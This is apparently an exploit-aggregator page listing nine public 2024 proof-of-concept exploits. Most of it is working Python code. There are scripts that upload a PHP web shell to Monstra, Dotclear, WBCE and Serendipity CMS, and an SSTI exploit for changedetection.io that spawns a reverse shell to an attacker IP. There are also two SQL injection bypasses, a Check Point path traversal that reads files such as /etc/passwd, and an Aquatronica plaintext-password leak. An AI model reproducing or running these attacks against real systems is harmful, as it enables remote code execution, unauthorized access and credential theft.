Latest exploits :: CodePwn

<pre><code># Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE) # Date: 05.05.2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested on: MacOS import requests import random import string import time import re import sys if len(sys.argv) < 4: print("Usage: python3 script.py <url> <username> <password>") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = requests.Session() login_url = f'{base_url}/admin/index.php?id=dashboard' login_data = { 'login': username, 'password': password, 'login_submit': 'Log+In' } filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k= 5)) print("Logging in...") response = session.post(login_url, data=login_data) if 'Dashboard' in response.text: print("Login successful") else: print("Login failed") exit() time.sleep(3) edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk' response = session.get(edit_url) # CSRF token bulmak için edit sayfasına erişim token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value=" (.*?)"', response.text) if token_search: token = token_search.group(1) else: print("CSRF token could not be found.") exit() content = ''' <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ''' edit_data = { 'csrf': token, 'name': filename, 'content': content, 'add_file': 'Save' } print("Preparing shell...") response = session.post(edit_url, data=edit_data) time.sleep(3) if response.status_code == 200: print(f"Your shell is ready: {base_url}/public/themes/default/{filename} .chunk.php") else: print("Failed to prepare shell.") </code></pre>

<pre><code># Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 26.04.2024 # Vendor Homepage: https://git.dotclear.org/explore/repos # Software Link: https://github.com/dotclear/dotclear/archive/refs/heads/master.zip # Tested Version: v2.29 (latest) # Tested on: MacOS import requests import time import random import string from bs4 import BeautifulSoup def generate_filename(extension=".inc"): return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension def get_csrf_token(response_text): soup = BeautifulSoup(response_text, 'html.parser') token = soup.find('input', {'name': 'xd_check'}) return token['value'] if token else None def login(base_url, username, password): print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) session = requests.Session() login_data = { "user_id": username, "user_pwd": password } login_url = f"{base_url}/admin/index.php?process=Auth" login_response = session.post(login_url, data=login_data) if "Logout" in login_response.text: print("Login Successful!") return session else: print("Login Failed!") return None def upload_file(session, base_url, filename): print("Shell Preparing...") time.sleep(1) boundary = "---------------------------376201441124932790524235275389" headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "X-Requested-With": "XMLHttpRequest" } csrf_token = get_csrf_token(session.get(f"{base_url} /admin/index.php?process=Media").text) payload = ( f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n" f"2097152\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n" f"{csrf_token}\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename} \"\r\n" f"Content-Type: image/jpeg\r\n\r\n" "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n" "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n" "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n" f"--{boundary}--\r\n" ) upload_response = session.post(f"{base_url} /admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0", headers=headers, data=payload.encode('utf-8')) if upload_response.status_code == 200: print(f"Your Shell is Ready: {base_url}/public/{filename}") else: print("Exploit Failed!") def main(base_url, username, password): filename = generate_filename() session = login(base_url, username, password) if session: upload_file(session, base_url, filename) if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: python script.py <siteurl> <username> <password>") else: base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main(base_url, username, password) </code></pre>

<pre><code># Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE) # Date: 3/5/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip # Version: 1.6.2 # Tested on: MacOS import requests from bs4 import BeautifulSoup import sys import time def login(url, username, password): print("Logging in...") time.sleep(3) with requests.Session() as session: response = session.get(url + "/admin/login/index.php") soup = BeautifulSoup(response.text, 'html.parser') form = soup.find('form', attrs={'name': 'login'}) form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in form.find_all('input') if input_tag.get('type') != 'submit'} # Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle form_data[soup.find('input', {'name': 'username_fieldname'})['value']] = username form_data[soup.find('input', {'name': 'password_fieldname'})['value']] = password post_response = session.post(url + "/admin/login/index.php", data=form_data) if "Administration" in post_response.text: print("Login successful!") time.sleep(3) return session else: print("Login failed.") print("Headers received:", post_response.headers) print("Response content:", post_response.text[:500]) # İlk 500 karakter return None def upload_file(session, url): # Dosya içeriğini ve adını belirleyin print("Shell preparing...") time.sleep(3) files = {'upload[]': ('shell.inc',"""<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>""", 'application/octet-stream')} data = { 'reqid': '18f3a5c13d42c5', 'cmd': 'upload', 'target': 'l1_Lw', 'mtime[]': '1714669495' } response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php", files=files, data=data) if response.status_code == 200: print("Your Shell is Ready: " + url + "/media/shell.inc") else: print("Failed to upload file.") print(response.text) if __name__ == "__main__": url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = login(url, username, password) if session: upload_file(session, url) </code></pre>

<pre><code># Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 26.04.2024 # Vendor Homepage: https://docs.s9y.org/ # Software Link:https://www.s9y.org/latest # Tested Version: v2.5.0 (latest) # Tested on: MacOS import requests import time import random import string from bs4 import BeautifulSoup def generate_filename(extension=".inc"): return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension def get_csrf_token(response): soup = BeautifulSoup(response.text, 'html.parser') token = soup.find('input', {'name': 'serendipity[token]'}) return token['value'] if token else None def login(base_url, username, password): print("Logging in...") time.sleep(2) session = requests.Session() login_page = session.get(f"{base_url}/serendipity_admin.php") token = get_csrf_token(login_page) data = { "serendipity[action]": "admin", "serendipity[user]": username, "serendipity[pass]": password, "submit": "Login", "serendipity[token]": token } headers = { "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{base_url}/serendipity_admin.php" } response = session.post(f"{base_url}/serendipity_admin.php", data=data, headers=headers) if "Add media" in response.text: print("Login Successful!") time.sleep(2) return session else: print("Login Failed!") return None def upload_file(session, base_url, filename, token): print("Shell Preparing...") time.sleep(2) boundary = "---------------------------395233558031804950903737832368" headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "Referer": f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media" } payload = ( f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n" f"{token}\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n" f"admin\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n" f"media\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n" f"add\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"{filename}\"\r\n" f"Content-Type: text/html\r\n\r\n" "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n" "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n" "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n" f"--{boundary}--\r\n" ) response = session.post(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media", headers=headers, data=payload.encode('utf-8')) if f"File {filename} successfully uploaded as" in response.text: print(f"Your shell is ready: {base_url}/uploads/{filename}") else: print("Exploit Failed!") def main(base_url, username, password): filename = generate_filename() session = login(base_url, username, password) if session: token = get_csrf_token(session.get(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media")) upload_file(session, base_url, filename, token) if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: python script.py <siteurl> <username> <password>") else: main(sys.argv[1], sys.argv[2], sys.argv[3]) </code></pre>

<pre><code># Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE) # Date: 5-26-2024 # Exploit Author: Zach Crosman (zcrosman) # Vendor Homepage: changedetection.io # Software Link: https://github.com/dgtlmoon/changedetection.io # Version: <= 0.45.20 # Tested on: Linux # CVE : CVE-2024-32651 from pwn import * import requests from bs4 import BeautifulSoup import argparse def start_listener(port): listener = listen(port) print(f"Listening on port {port}...") conn = listener.wait_for_connection() print("Connection received!") context.newline = b'\r\n' # Switch to interactive mode conn.interactive() def add_detection(url, listen_ip, listen_port, notification_url=''): session = requests.Session() # First request to get CSRF token request1_headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = session.get(url, headers=request1_headers) soup = BeautifulSoup(response.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] print(f'Obtained CSRF token: {csrf_token}') # Second request to submit the form and get the redirect URL add_url = f"{url}/form/add/quickwatch" add_url_headers = { # Define add_url_headers here "Origin": url, "Content-Type": "application/x-www-form-urlencoded" } add_url_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/baseball", "tags": '', "edit_and_watch_submit_button": "Edit > Watch", "processor": "text_json_diff" } post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False) # Extract the URL from the Location header if 'Location' in post_response.headers: redirect_url = post_response.headers['Location'] print(f'Redirect URL: {redirect_url}') else: print('No redirect URL found') return # Third request to add the changedetection url with ssti in notification config save_detection_url = f"{url}{redirect_url}" save_detection_headers = { # Define save_detection_headers here "Referer": redirect_url, "Cookie": f"session={session.cookies.get('session')}" } save_detection_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/all", "title": '', "tags": '', "time_between_check-weeks": '', "time_between_check-days": '', "time_between_check-hours": '', "time_between_check-minutes": '', "time_between_check-seconds": '30', "filter_failure_notification_send": 'y', "fetch_backend": 'system', "webdriver_delay": '', "webdriver_js_execute_code": '', "method": 'GET', "headers": '', "body": '', "notification_urls": notification_url, "notification_title": '', "notification_body": f""" {{% for x in ().__class__.__base__.__subclasses__() %}} {{% if "warning" in x.__name__ %}} {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}} {{% endif %}} {{% endfor %}} """, "notification_format": 'System default', "include_filters": '', "subtractive_selectors": '', "filter_text_added": 'y', "filter_text_replaced": 'y', "filter_text_removed": 'y', "trigger_text": '', "ignore_text": '', "text_should_not_be_present": '', "extract_text": '', "save_button": 'Save' } final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data) print('Final request made.') if __name__ == "__main__": parser = argparse.ArgumentParser(description='Add detection and start listener') parser.add_argument('--url', type=str, required=True, help='Base URL of the target site') parser.add_argument('--port', type=int, help='Port for the listener', default=4444) parser.add_argument('--ip', type=str, required=True, help='IP address for the listener') parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default') args = parser.parse_args() add_detection(args.url, args.ip, args.port, args.notification) start_listener(args.port) </code></pre>

<pre><code># Exploit Title: Online Payment Hub System - SQLi Authentication Bypass # Date: 29.05.2024 # Exploit Author: Hamit Avşar # Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code # Version: 1.0 # Tested on: Windows 11, Kali Linux # Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/oph/admin/login.php 2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC Request POST /oph/classes/Login.php?f=login HTTP/1.1 Host: localhost Content-Length: 42 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/oph/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479i Connection: close username=admin'+or+'1'%3D'1&password=hamit -------------------------------------------------------------------------------------------------------------------------------- response HTTP/1.1 200 OK Date: Wed, 29 May 2024 17:15:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} </code></pre>

<pre><code>Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection Date: 14 Apr 2024 Exploit Author: Ivan Spiridonov (xbz0n) Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135 Version: 2.0.3 Tested on: Ubuntu 20.04 CVE: CVE-2024-32136 SQL Injection SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. Affected Components Plugin: BWL Advanced FAQ Manager Version: 2.0.3 Affected Parameter: 'date_range' Affected Page: /wp-admin/edit.php Description The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter. Proof of Concept Manual Exploitation The following GET request demonstrates the vulnerability: GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics Connection: close Cookie: [Relevant Cookies] Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability. Recommendations BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4. </code></pre>

<pre><code># Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 # Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, | | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, path): url = url + '/clients/MyCRL' data = "aCSHELL/../../../../../../../../../../.."+ path headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' } s = Session() req = Request('POST', url, data=data, headers=headers) prepped = req.prepare() #del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) print(prepped.headers) print(url) print(resp.headers) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 3): print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0])) print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2]) </code></pre>

<pre><code>#!/usr/bin/env python # -*- coding: utf-8 -*- # # # Aquatronica Control System 5.1.6 Passwords Leak Vulnerability # # # Vendor: Aquatronica s.r.l. # Product web page: https://www.aquatronica.com # Affected version: Firmware: 5.1.6 # Web: 2.0 # # Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy # to use, allowing you to control all the electrical devices in # an aquarium and to monitor all their parameters; it can be used # for soft water aquariums, salt water aquariums or both simultaneously. # # Desc: The tcp.php endpoint on the Aquatronica controller is exposed # to unauthenticated attackers over the network. This vulnerability # allows remote attackers to send a POST request which can reveal # sensitive configuration information, including plaintext passwords. # This can lead to unauthorized access and control over the aquarium # controller, compromising its security and potentially allowing attackers # to manipulate its settings. # # Tested on: Apache/2.0.54 (Unix) # PHP/5.4.17 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2024-5824 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php # # # 04.05.2024 # import requests, html, re, sys, time from urllib.parse import unquote program = "TCP" command = "ws_get_network_cfg" function_id = "TCP_XML_REQUEST" print(""" _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | \^^^^ == \_/ | `\_ === \. | / /\_ \ / | |/ \_ \| / ___ ______________\________/________aquatronica_0day___ | | | | | | """) if len(sys.argv) != 2: print("Usage: python aqua.py <ip:port>") sys.exit(1) ip = sys.argv[1] url = f"http://{ip}/{program.lower()}.php" post_data = {'function_id' : function_id.lower(), 'command' : command.upper()} r = requests.post(url, data=post_data) if r.status_code == 200: r_d = unquote(r.text) f_d_r = html.unescape(r_d) regex = r'pwd="([^"]+)"' rain = re.findall(regex, f_d_r) for drops in rain: print(' ',drops) time.sleep(0.5) else: print(f"Dry season! {r.status_code}") </code></pre>